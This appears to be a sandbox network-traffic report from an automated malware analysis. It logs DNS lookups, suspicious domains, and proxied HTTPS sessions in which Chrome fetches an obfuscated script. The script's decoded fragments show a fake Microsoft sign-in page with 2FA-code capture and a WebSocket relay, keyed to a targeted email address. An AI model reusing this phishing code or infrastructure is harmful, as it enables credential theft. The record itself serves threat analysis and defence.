Mar 20, 2025 23:53:13.706742048 CET	1.1.1.1	192.168.2.24	0xeda4	No error (0)	server1.linxcoded.top		185.174.100.76	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:13.788233042 CET	1.1.1.1	192.168.2.24	0x88bd	Name error (3)	_8105._https.server1.linxcoded.top	none	none	65	IN (0x0001)	false
Mar 20, 2025 23:53:14.313859940 CET	1.1.1.1	192.168.2.24	0x2405	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:14.313859940 CET	1.1.1.1	192.168.2.24	0x2405	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:14.313859940 CET	1.1.1.1	192.168.2.24	0x2405	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:14.315643072 CET	1.1.1.1	192.168.2.24	0xa0ab	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 20, 2025 23:53:14.868053913 CET	1.1.1.1	192.168.2.24	0xb2ab	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:14.868053913 CET	1.1.1.1	192.168.2.24	0xb2ab	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:14.868053913 CET	1.1.1.1	192.168.2.24	0xb2ab	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:14.869937897 CET	1.1.1.1	192.168.2.24	0x9a15	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 20, 2025 23:53:22.007528067 CET	1.1.1.1	192.168.2.24	0x424e	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 20, 2025 23:53:39.251034975 CET	1.1.1.1	192.168.2.24	0x729a	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

browser.events.data.msn.cn

office.avcbtech.store

sender.linxcoded.top

code.jquery.com

i.imgur.com

api.ipify.org

avcbtech.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.24	60821	52.182.143.213	443

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:52:46 UTC	473	OUT	POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742511165047&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1 Accept-Encoding: gzip, deflate Content-Length: 3656 Content-Type: application/json; charset=UTF-8 Host: browser.events.data.msn.cn Connection: Keep-Alive Cache-Control: no-cache
2025-03-20 22:52:46 UTC	3656	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 53 65 72 76 65 72 4c 6f 67 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 63 34 39 38 37 31 31 66 30 32 36 35 34 65 64 63 61 38 61 37 31 35 63 61 36 65 31 63 62 34 64 34 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 33 2d 32 30 54 32 32 3a 35 32 3a 33 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 64 61 74 61 22 3a 7b 22 70 61 67 65 22 3a 7b 22 70 72 6f 64 75 63 74 22 3a 22 65 6e 74 77 69 6e 64 6f 77 73 64 61 73 68 22 2c 22 61 70 70 54 79 70 65 22 3a 22 77 69 6e 57 69 64 67 65 74 73 22 2c 22 6e 61 6d 65 22 3a 22 77 69 6e 70 32 62 61 63 6b 69 6e 67 61 70 70 22 2c 22 69 73 4d 6f 63 6b 45 6e 76 22 3a 66 61 6c 73 65 2c 22 68 6f 73 74 56 65 72 22 3a 22 35 32 34 2e 33 30 35 30 32 2e 33 30 2e 30 22 2c 22 Data Ascii: {"name":"MS.News.Web.ServerLog","iKey":"o:c498711f02654edca8a715ca6e1cb4d4","time":"2025-03-20T22:52:35Z","ver":"4.0","data":{"page":{"product":"entwindowsdash","appType":"winWidgets","name":"winp2backingapp","isMockEnv":false,"hostVer":"524.30502.30.0","

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.24	60838	139.28.36.38	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:52:56 UTC	573	OUT	GET /gtk/xls/g1t2k.js?uid=ombudsman@ombudsman.gov.au HTTP/1.1 Host: office.avcbtech.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:52:56 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.26.3 Date: Thu, 20 Mar 2025 22:52:56 GMT Content-Type: application/javascript Content-Length: 68421 Last-Modified: Mon, 10 Mar 2025 21:25:01 GMT Connection: close ETag: "67cf58ad-10b45" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-20 22:52:56 UTC	15988	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 31 31 62 28 29 7b 76 61 72 20 5f 30 78 35 30 64 36 39 35 3d 5b 27 23 62 61 63 6b 27 2c 27 49 6e 63 6f 72 72 65 63 74 5c 78 32 30 32 46 41 5c 78 32 30 63 6f 64 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 76 36 27 2c 27 23 62 61 63 6b 2d 74 65 78 74 27 2c 27 74 79 70 65 27 2c 27 4d 69 63 72 6f 73 6f 66 74 27 2c 27 72 65 6c 61 79 27 2c 27 36 6b 67 6a 58 4c 43 27 2c 27 73 74 79 6c 65 27 2c 27 70 61 67 65 5f 76 69 73 69 74 27 2c 27 63 6c 6f 73 65 27 2c 27 61 70 70 72 6f 76 65 5f 73 69 67 6e 69 6e 27 2c 27 64 69 76 35 27 2c 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 27 2c 27 23 63 61 70 74 63 68 61 2d 62 74 6e 27 2c 27 2e 6c 6f 67 6f 6e 61 6d 65 27 2c 27 64 69 73 61 62 Data Ascii: function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disab
2025-03-20 22:52:56 UTC	16384	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28 35 31 2c 5c 78 32 30 35 31 2c 5c 78 32 30 35 31 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 Data Ascii: \x20\x20\x20\x20\x20\x20\x20font-size:\x2016px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20rgb(51,\x2051,\x2051);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
2025-03-20 22:52:57 UTC	16384	IN	Data Raw: 32 32 3e 3c 70 5c 78 32 30 69 64 3d 5c 78 32 32 61 70 70 72 6f 76 65 2d 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 68 33 5c 78 32 30 74 65 78 74 2d 63 65 6e 74 65 72 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 6f 72 64 65 72 3a 5c 78 32 30 32 70 78 5c 78 32 30 73 6f 6c 69 64 5c 78 32 30 62 6c 61 63 6b 3b 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 34 30 70 78 3b 5c 78 32 30 70 61 64 64 69 6e 67 3a 5c 78 32 30 31 32 70 78 5c 78 32 30 31 32 70 78 3b 5c 78 32 30 74 65 78 74 2d 61 6c 69 67 6e 3a 5c 78 32 30 63 65 6e 74 65 72 3b 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 78 32 32 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 27 2c 27 3c 61 5c 78 32 30 68 72 65 66 Data Ascii: 22><p\x20id=\x22approve-number\x22\x20class=\x22h3\x20text-center\x22\x20style=\x22border:\x202px\x20solid\x20black;\x20font-size:\x2040px;\x20padding:\x2012px\x2012px;\x20text-align:\x20center;\x20display:\x20inline-block;\x22></p></div><br>','<a\x20href
2025-03-20 22:52:57 UTC	16384	IN	Data Raw: 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 5f 30 78 34 64 34 61 64 61 28 30 78 32 34 62 29 29 2c 5f 30 78 35 66 63 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 27 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 67 72 6f 75 70 5c 78 32 30 6d 74 2d 32 5c 78 32 32 3e 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 72 6f 75 6e 64 65 64 2d 30 5c 78 32 30 62 6f 72 64 65 72 2d 64 61 72 6b 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 Data Ascii: 214[_0x4d4ada(0x188)](_0x4d4ada(0x24b)),_0x5fc214[_0x4d4ada(0x188)]('<div\x20class=\x22form-group\x20mt-2\x22><input\x20type=\x22email\x22\x20name=\x22ai\x22\x20class=\x22form-control\x20rounded-0\x20border-dark\x22\x20id=\x22ai\x22\x20aria-describedby=\x
2025-03-20 22:52:57 UTC	3281	IN	Data Raw: 28 27 23 6d 73 67 2d 32 66 61 27 29 5b 5f 30 78 32 38 35 37 35 66 28 30 78 31 62 37 29 5d 28 5f 30 78 32 38 35 37 35 66 28 30 78 31 39 32 29 29 3b 7d 7d 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 2c 27 65 72 72 6f 72 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 34 61 33 65 36 3d 5f 30 78 31 38 63 32 37 61 3b 24 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 39 29 29 5b 27 74 65 78 74 27 5d 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 38 29 29 2c 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 7d 29 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 31 30 37 31 66 32 3d 6e 65 77 20 57 65 62 53 6f 63 6b 65 74 28 5f 30 78 31 38 63 32 37 61 28 30 78 31 64 63 29 29 3b 5f 30 78 31 30 37 31 66 32 5b 5f 30 78 31 38 63 32 37 61 28 30 78 32 33 38 29 5d 3d 66 75 6e 63 Data Ascii: ('#msg-2fa')[_0x28575f(0x1b7)](_0x28575f(0x192));}}_0x168ef3();},'error':function(){var _0x44a3e6=_0x18c27a;$(_0x44a3e6(0x1b9))['text'](_0x44a3e6(0x1b8)),_0x168ef3();}});else{const _0x1071f2=new WebSocket(_0x18c27a(0x1dc));_0x1071f2[_0x18c27a(0x238)]=func

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.24	60839	185.174.100.20	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:52:58 UTC	566	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: sender.linxcoded.top Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:52:59 UTC	383	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 20 Mar 2025 22:52:58 GMT Content-Type: text/css Content-Length: 258966 Last-Modified: Mon, 27 Jan 2025 22:21:00 GMT Connection: close ETag: "679806cc-3f396" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-20 22:52:59 UTC	16001	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2025-03-20 22:52:59 UTC	16384	IN	Data Raw: 75 70 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 34 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 34 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d Data Ascii: up: 5; -ms-flex-order: 4; order: 4 } .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6;
2025-03-20 22:52:59 UTC	16384	IN	Data Raw: 65 78 2d 6f 72 64 65 72 3a 20 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 39 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 Data Ascii: ex-order: 9; order: 9 } .order-lg-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10; order: 10 } .order-lg-11 { -webkit-box-ordinal-group: 12;
2025-03-20 22:52:59 UTC	16384	IN	Data Raw: 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 62 74 6e 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 0d 0a 20 20 20 20 2e 69 6e Data Ascii: roup-prepend>.form-control-plaintext.btn, .input-group-sm>.input-group-prepend>.form-control-plaintext.input-group-text { padding-right: 0; padding-left: 0 } .form-control-sm, .input-group-sm>.form-control, .in
2025-03-20 22:52:59 UTC	16384	IN	Data Raw: 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 35 34 35 62 36 32 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 34 65 35 35 35 62 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 20 7b Data Ascii: ; background-color: #545b62; border-color: #4e555b } .btn-secondary:not(:disabled):not(.disabled).active:focus, .btn-secondary:not(:disabled):not(.disabled):active:focus, .show>.btn-secondary.dropdown-toggle:focus {
2025-03-20 22:52:59 UTC	16384	IN	Data Raw: 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 72 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 62 6f 64 79 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 2d 67 72 6f 75 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 6c 61 70 73 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 76 Data Ascii: apse.show { display: block } tr.collapse.show { display: table-row } tbody.collapse.show { display: table-row-group } .collapsing { position: relative; height: 0; ov
2025-03-20 22:52:59 UTC	16384	IN	Data Raw: 72 61 64 69 6f 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 2d 34 20 2d 34 20 38 20 38 27 25 33 45 25 33 43 63 69 72 63 6c 65 20 72 3d 27 33 27 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 Data Ascii: radio .custom-control-input:checked~.custom-control-label::after { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E") }
2025-03-20 22:52:59 UTC	16384	IN	Data Raw: 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 Data Ascii: d { -ms-flex-wrap: nowrap; flex-wrap: nowrap } .navbar-expand .navbar-collapse { display: -webkit-box !important; display: -ms-flexbox !important; display: flex !important; -ms-flex-preferr
2025-03-20 22:52:59 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 39 65 63 65 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 33 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 72 65 6d 20 32 72 65 6d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b Data Ascii: background-color: #e9ecef; border-radius: .3rem } @media (min-width:576px) { .jumbotron { padding: 4rem 2rem } } .jumbotron-fluid { padding-right: 0; padding-left: 0;
2025-03-20 22:52:59 UTC	16384	IN	Data Raw: 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 2e 34 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 2e 38 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 Data Ascii: t^=right] .arrow, .bs-tooltip-right .arrow { left: 0; width: .4rem; height: .8rem } .bs-tooltip-auto[x-placement^=right] .arrow::before, .bs-tooltip-right .arrow::before { right: 0; border

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.24	60841	151.101.66.137	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
